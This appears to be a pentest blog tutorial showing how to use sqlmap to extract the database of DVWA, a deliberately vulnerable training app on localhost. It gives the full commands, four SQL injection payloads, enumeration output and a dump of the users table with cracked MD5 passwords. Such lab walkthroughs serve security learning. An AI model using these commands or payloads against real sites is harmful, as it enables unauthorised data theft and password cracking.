Extract Database With Sqlmap

By -
Bismlillah...

Hello, buddy! have ever think why Oracle Corp will monopolize and commercialize Mysql? While many people already depended on it in their development. You do not need to answer it, seriously. Coz now we aren't going to talk about that, but we're gonna talk about how to use Sqlmap to extract database.

Assumption:
  • You have apache2, mysql, phpmyadmin instaled on your system.
  • I use DVWA for victim site, click here for more information and download link.
  • You have found the vulnerable from DVWA site. Click here for tutorial.
  • I use Mantra and Burp Suite for IG(Information Gathering). Click here for tutorial!. Important to find the cookie.
Open your teminal and go to sqlmap directory "cd /pentest/database/sqlmap/" or use gnome menu.
So let's rock, here's the step:

  1. First read the manual by typing "./sqlmap -h".
  2. If you are already knew about the usage, let's continue. Here's the syntax "./sqlmap.py -u victim_url --cookie=Cookie --dbs" if the targeted website has login page we have to find the cookie, we can use Burp Suite. But if no, just go to vurnerable webseite immediately "./sqlmap.py -u victim_url  --dbs". Realize the differences among the the syntaxes, "-u" for url and "--dbs" for capturing database name. In my case will be like this:
    ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" --dbs
    3. Open :


        sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
        http://sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 17:17:09

    [17:17:10] [INFO] resuming back-end DBMS 'mysql' 
    [17:17:10] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit

        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit
    ---

    [17:17:10] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [17:17:10] [INFO] fetching database names
    [17:17:10] [WARNING] reflective value(s) found and filtering out
    available databases [6]:
    cacti
    [*] dvwa
    [*] information_schema
    [*] mysql
    [*] nowasp
    [*] owasp10

    [17:17:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
    [*] shutting down at 17:17:10
    Can you see the databases? Now guess which the related one is. Yeah you are right, dvwa is the one that we are looking for :D
  3. We got the database name now "dvwa", the next duty is to get the tables name.
    4. /sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" -D dvwa --tables
    Open :

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
        http://sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 17:37:07

    [17:37:07] [INFO] resuming back-end DBMS 'mysql'
    [17:37:07] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit

        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit
    ---

    [17:37:08] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [17:37:08] [INFO] fetching tables for database: 'dvwa'
    [17:37:08] [WARNING] reflective value(s) found and filtering out
    Database: dvwa
    [2 tables]
    +-----------+
    | guestbook |
    | users     |
    +-----------+

    [17:37:08] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

    [*] shutting down at 17:37:08
    Sure, you can see those tables name, nothing left to do just dumping that users table.
  4. Don't be happy, we still get things to do.
    5. ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" -T users --dump
    Open :


       sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
        http://sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 17:38:00

    [17:38:01] [INFO] resuming back-end DBMS 'mysql'
    [17:38:01] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit

        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit
    ---

    [17:38:01] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [17:38:01] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
    [17:38:01] [INFO] fetching current database
    [17:38:01] [WARNING] reflective value(s) found and filtering out
    [17:38:02] [INFO] fetching columns for table 'users' in database 'dvwa'
    [17:38:02] [INFO] fetching entries for table 'users' in database 'dvwa'
    [17:38:02] [INFO] analyzing table dump for possible password hashes
    recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] Y

    [17:38:19] [INFO] using hash method 'md5_generic_passwd'
    what dictionary do you want to use?
    [1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
    [2] custom dictionary file
    [3] file with list of dictionary files
    > 1

    [17:39:26] [INFO] using default dictionary
    [17:39:26] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
    do you want to use common password suffixes? (slow!) [y/N] y

    [17:39:29] [INFO] starting dictionary-based cracking (md5_generic_passwd)
    [17:39:29] [INFO] starting 4 processes
    [17:39:35] [INFO] cracked password 'abc123' for user 'gordonb'              
    [17:39:37] [INFO] cracked password 'charley' for user '1337'                
    [17:39:42] [INFO] cracked password 'letmein' for user 'pablo'                
    [17:39:45] [INFO] cracked password 'password' for user 'admin'              
    [17:39:50] [INFO] postprocessing table dump                                  
    Database: dvwa
    Table: users
    [5 entries]
    +---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
    | user_id | user    | avatar                                           | password                                    | last_name | first_name |
    +---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
    | 1       | admin   | http://localhost/dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
    | 2       | gordonb | http://localhost/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
    | 3       | 1337    | http://localhost/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
    | 4       | pablo   | http://localhost/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
    | 5       | smithy  | http://localhost/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
    +---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+

    [17:39:50] [INFO] table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
    [17:39:50] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

    [*] shutting down at 17:39:50
    Viola.... the usenames and password appear.. it seems the passwords are encrypted (md5 maybe). Your last duty to solve it :P

Comments

Post a Comment

Populer Post

How To Install Mutillidae And Try A Little Test

By -
Image
Bismillah... So, bofore we start sharing about Mutillidae. Better for us to know it's definition. Open the spoiler to read it, but if you aren't patient enough, just pass it by :D Open: Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to install or administrate their own webserver. It is already installed on Samurai WTF. Simply replace existing version with latest on Samurai. Mutillidae contains dozens of vulnerabilities and hints to help the user exploit them; providing an easy-to-use web hacking environment deliberately designed to be used as a hack-lab for security enthusiast, classroom labs, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an "assess the assessor" tar...
Read more